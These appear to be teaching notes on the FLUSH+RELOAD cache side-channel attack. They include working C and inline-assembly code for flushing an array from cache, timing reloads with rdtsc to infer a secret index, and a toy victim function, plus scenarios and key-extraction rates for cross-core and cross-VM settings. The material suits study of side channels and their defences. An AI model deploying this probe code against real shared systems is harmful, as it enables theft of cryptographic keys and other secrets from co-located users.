FLUSH+RELOAD Steps

FLUSH Step
Assumptions for flushing the LLC (Last-Level Cache)
- Page sharing (due, e.g., to deduplication)
- Unprivileged cache flush instruction
- Cache inclusiveness to prevent non-exclusive Multilevel Caches like level 1 data is not in level 2
void flush() { int i; // Write to array to bring it to RAM (e.g., could have been paged-out) for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1; // Flush the values of the array from cache for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]); }
RELOAD Step
C volatile variable for cache inclusiveness
int probe(uint8_t *adrs) { volatile unsigned long time; asm __volatile__( " mfence \n" " lfence \n" " rdtsc \n" " lfence \n" " movl %%eax, %%esi \n" " movl (%1), %%eax \n" " lfence \n" " rdtsc \n" " subl %%esi, %%eax \n" " clflush 0(%1) \n" : "=a" (time) : "c" (adrs) : "%esi", "%edx" ); return time < CACHE_HIT_THRESHOLD; } void reload() { int junk = 0; uint8_t *adrs; int i; for (i = 0; i < 256; i++) { adrs = &array[i*4096 + DELTA]; if ( probe(adrs) ) { printf("array[%d*4096 + %d] is in cache.\n", i, DELTA); printf("The secret = %d.\n", i); } } }
This code access 256 times with 4096 byte padding spacial Cache Locality to avoid using same Cache Line unit.
Attack Scenarios
- Shared Last Level Cache (LLC) with different processor cores
- Same-OS/Co-located-VM scenarios with OS/VM uses page deduplication
By observing a single signing or decryption round, the attack extracts 98.7% of the bits on average in the same OS scenario and 96.7% in the cross-VM scenario, with a worst case of 95% and 90%, respectively.
Victim Program
Assumption: there is a victim function that uses a secret value as an index to load some values from an array, as follows
void victim(char secret) { temp = array[secret * 4096 + DELTA]; }